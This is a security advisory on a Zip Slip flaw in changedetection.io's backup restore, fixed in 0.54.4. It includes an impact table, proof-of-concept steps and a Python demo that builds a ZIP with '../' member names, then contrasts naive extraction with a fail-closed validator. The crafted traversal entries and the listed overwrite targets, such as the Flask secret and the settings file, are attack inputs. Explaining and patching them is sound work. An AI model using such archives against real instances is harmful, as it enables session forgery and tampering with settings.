Description
changedetection.io has a Zip Slip vulnerability in the backup restore functionality
Summary
A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives.
Details
The backup restore functionality hands the uploaded archive to zipfile.extractall() without validating the member names it contains. Names carrying ../ sequences are therefore used as-is to decide where extracted data is written, which lets an attacker overwrite files the restore was never meant to touch.
Vulnerable Code (lines 50-53):
extractall() writes each member to the name stored in the archive, relative to the extraction directory, so whoever built the archive decides which files are created or overwritten. One caveat for anyone reproducing this: since Python 3.3.1 CPython's zipfile strips leading separators, drive letters and ".." components from member names before extracting (this is documented on ZipFile.extract), so an entry named ../secret.txt is written as secret.txt inside the extraction directory, not in its parent. The overwrites in the table below therefore land when the extraction directory is the datastore itself, which is consistent with the PoC's verification step looking for the injected watch directly under /datastore/. Older interpreters, or any replacement extraction routine that does not sanitise names, let the ".." components take effect as written.
| Path in ZIP | Target File | Impact |
|---|---|---|
| ../secret.txt | Flask secret key | Session forgery, auth bypass |
| ../changedetection.json | App settings | Disable password, inject backdoor |
| ../url-watches.json | Watch index | Inject malicious watches |
| ../{uuid}/watch.json | Watch config | Modify any watch |
The attacker uploads a crafted ZIP through the backup restore functionality at /backups/restore. The application extracts it without validating member names, writing attacker-controlled content into the sensitive files listed above.
PoC
Step 1: Create Malicious ZIP
Step 2: Upload via Restore Endpoint
Step 3: Verify Path Traversal
Check whether the injected watch landed in /datastore/:
ls -la /datastore/
Look for a directory named pwned-uuid-1234/.
Verify in the UI (the injected watch carries the marker string ZIPSLIP):
curl "http://target:5000/" | grep "ZIPSLIP"
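The following script is an added example and is not code from changedetection.io or from the advisory's own PoC. It carries Step 1 and the Details section through in working code: it builds an archive whose member names contain the ../ entries from the table above, shows what CPython's extractall() actually does with them (the ".." components are dropped and the files land inside the extraction directory, overwriting an existing secret.txt there), and contrasts that with a fail-closed restore that validates every member name before writing anything and refuses the whole archive. The datastore layout, the file contents and the assumption that the restore extracts straight into the datastore directory are all constructed for the demonstration; the archive is built in memory, so nothing is uploaded anywhere.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path

# Constructed sample archive (not a real changedetection.io backup): the member
# names carry the '../' components from the advisory's table, the contents are
# made up for the demonstration.
MALICIOUS_ENTRIES = {
    "../secret.txt": b"attacker-controlled-secret",
    "../changedetection.json": b'{"note": "attacker-controlled settings"}',
    "../pwned-uuid-1234/watch.json": b'{"url": "http://attacker.invalid/ZIPSLIP"}',
}


class UnsafeArchiveEntry(ValueError):
    """Raised when an archive member would be written outside the restore directory."""


def build_malicious_zip(entries=MALICIOUS_ENTRIES):
    """Step 1 of the PoC: writestr() stores the member name verbatim, so the
    '../' sequences survive in the central directory exactly as crafted."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def entry_names(zip_bytes):
    """Member names as stored in the archive, traversal sequences included."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def _listing(dest):
    """Relative paths of all regular files below dest, for inspection."""
    dest = Path(dest)
    return sorted(p.relative_to(dest).as_posix() for p in dest.rglob("*") if p.is_file())


def naive_restore(zip_bytes, dest):
    """The pattern the advisory describes: extractall() with no per-member check.
    CPython strips the '..' components, so every member still lands inside dest,
    which is exactly the problem when dest is the live datastore."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
    return _listing(dest)


def safe_restore(zip_bytes, dest):
    """Hardened restore: validate every member name before writing anything and
    refuse the whole archive on the first bad entry (fail closed)."""
    base = Path(dest).resolve()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            parts = name.replace("\\", "/").split("/")
            # Inspect the name as stored, not the library-normalised form.
            if os.path.isabs(name) or name.startswith(("/", "\\")) or ".." in parts:
                raise UnsafeArchiveEntry(f"refusing member {name!r}")
            target = (base / name).resolve()
            # Containment check: catches drive letters and symlinked directories
            # that the textual check above cannot see.
            if target != base and base not in target.parents:
                raise UnsafeArchiveEntry(f"member {name!r} resolves outside {base}")
        zf.extractall(base)
    return _listing(base)


def demo():
    """Run both restores against a scratch directory standing in for the
    datastore. Assumption (not stated by the advisory): the restore extracts
    directly into the datastore, where secret.txt already exists."""
    zip_bytes = build_malicious_zip()
    results = {"names": entry_names(zip_bytes)}

    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        datastore = root / "datastore"
        datastore.mkdir()
        (datastore / "secret.txt").write_bytes(b"original-flask-secret")
        results["naive_files"] = naive_restore(zip_bytes, datastore)
        results["naive_secret"] = (datastore / "secret.txt").read_bytes()
        # Anything written beside the datastore would be a true escape; CPython's
        # zipfile drops the '..' components, so this list stays empty.
        results["naive_escaped"] = sorted(p.name for p in root.iterdir() if p != datastore)

    with tempfile.TemporaryDirectory() as tmp:
        datastore = Path(tmp) / "datastore"
        datastore.mkdir()
        (datastore / "secret.txt").write_bytes(b"original-flask-secret")
        try:
            safe_restore(zip_bytes, datastore)
            results["safe_rejected"] = False
        except UnsafeArchiveEntry:
            results["safe_rejected"] = True
        results["safe_secret"] = (datastore / "secret.txt").read_bytes()
        results["safe_files"] = _listing(datastore)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Running the script shows the two outcomes side by side: the naive restore replaces secret.txt with the attacker's bytes and creates pwned-uuid-1234/watch.json inside the datastore, while the hardened restore raises on the first ../ member and leaves the datastore untouched. Rejecting the archive rather than silently renaming its members is deliberate: a backup containing traversal entries is not a backup the application should ever accept.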
Packages
| Package | Affected versions | Patched version |
|---|---|---|
| changedetection.io | <= 0.54.3 | 0.54.4 |
Related vulnerabilities
changedetection.io is a free open source web page change detection tool. Prior to version 0.54.4, a Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. This issue has been patched in version 0.54.4.